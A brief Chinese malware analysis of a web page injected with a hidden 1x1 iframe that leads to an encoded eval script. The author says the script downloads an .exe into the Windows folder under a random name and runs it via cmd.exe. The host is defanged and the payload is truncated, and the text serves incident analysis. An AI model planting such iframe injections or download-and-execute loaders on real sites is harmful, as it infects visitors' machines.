检查网页代码,被加入:
/--- <iframe src=hxxp://i**.x***in**8.info/wm.htm width=1 height=1></iframe> ---/
hxxp://i**.x***in**8.info/wm.htm 包含代码:
/--- <script src=0614.js></script> ---/
hxxp://i**.x***in**8.info/0614.js 内容为:
/--- eval("/146/165/156/143/…(略)…/146/75/61/73/175") ---/
经过2次解密,得到原始代码,功能是下载 down.exe,保存到%windir%下,文件名由自定义函数:
/--- function QK45u3(rm4mf){var m0qNW = window[“Math”][“random”]()*rm4mf;return Math[“round”](m0qNW)+‘.exe’;} ---/
即***.exe,其中*为数字,接着通过cmd.exe /c 来运行。
